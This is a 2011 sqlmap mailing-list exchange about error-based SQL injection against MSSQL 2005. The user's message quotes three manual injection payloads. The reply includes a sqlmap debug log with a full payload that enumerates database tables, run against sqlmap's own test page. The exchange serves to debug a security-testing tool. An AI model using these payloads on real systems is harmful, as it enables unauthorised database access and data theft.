hi execute.
this was retested at least 100 times.
snippet (against MSSQL 2005):
[12:45:38] [PAYLOAD] 1' AND 5424=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(112)+CHAR(
121)+CHAR(58)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(sysusers.name+CHAR(46)+sysobj
ects.name AS NVARCHAR(4000)),CHAR(32))),1,100) FROM testdb..sysobjects INNER JOI
N sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN (CHAR(117), CHAR(118)
) AND sysusers.name+CHAR(46)+sysobjects.name NOT IN (SELECT TOP 2 ISNULL(sysuser
s.name+CHAR(46)+sysobjects.name,CHAR(32)) FROM testdb..sysobjects INNER JOIN sys
users ON sysobjects.uid = sysusers.uid WHERE xtype IN (CHAR(117), CHAR(118)) ORD
ER BY 1) ORDER BY 1)+CHAR(58)+CHAR(106)+CHAR(110)+CHAR(116)+CHAR(58))) AND 'vVWe
'='vVWe
[12:45:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[12:45:38] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting
the nvarchar value ':ipy:dbo.users:jnt:' to data type int.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
i am not sure what's wrong with your case. you can contact me
privatelly and send me some more info.
kr
On Sat, May 7, 2011 at 7:46 PM, execute <exec...@gmail.com> wrote:
> Hey,
> I'm using the error-based technique for extracting data from an MSSQL server
> (2005 - 9.00.4053.00). It seems like concating the sub-query with a string
> doesn't work well - for some reason, the webserver returns the regular
> response for row not found instead of throwing an error.
> I tested it manually and found the following:
>
> ') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects WHERE xtype =
> 'U')) -- - Works well - throws an error with a table name ("Conversion
> failed when converting the nvarchar value 'TABLE-NAME' to data type int.")
> ') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE
> xtype = 'U')) -- - Works well - throws an error with a table name
> ("Conversion failed when converting the nvarchar value 'x:TABLE-NAME' to
> data type int.")
> ') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects WHERE xtype
> = 'U')) -- - Doesn't work - just returns 'page not found' (not an 404 error,
> an error from the script telling that no rows were found)
>
> Can anyone test and confirm this? I'm not quite sure why that happens, but
> it seems like it can easily be fixed by adding the strings inside the
> sub-query (SELECT ':foo'+...+':bar:') instead of outside of it as it does
> now.
> Thanks
>
> ------------------------------------------------------------------------------
> WhatsUp Gold - Download Free Network Management Software
> The most intuitive, comprehensive, and cost-effective network
> management toolset available today. Delivers lowest initial
> acquisition cost and overall TCO of any competing solution.
> http://p.sf.net/sfu/whatsupgold-sd
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
------------------------------------------------------------------------------
WhatsUp Gold - Download Free Network Management Software
The most intuitive, comprehensive, and cost-effective network
management toolset available today. Delivers lowest initial
acquisition cost and overall TCO of any competing solution.
http://p.sf.net/sfu/whatsupgold-sd
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
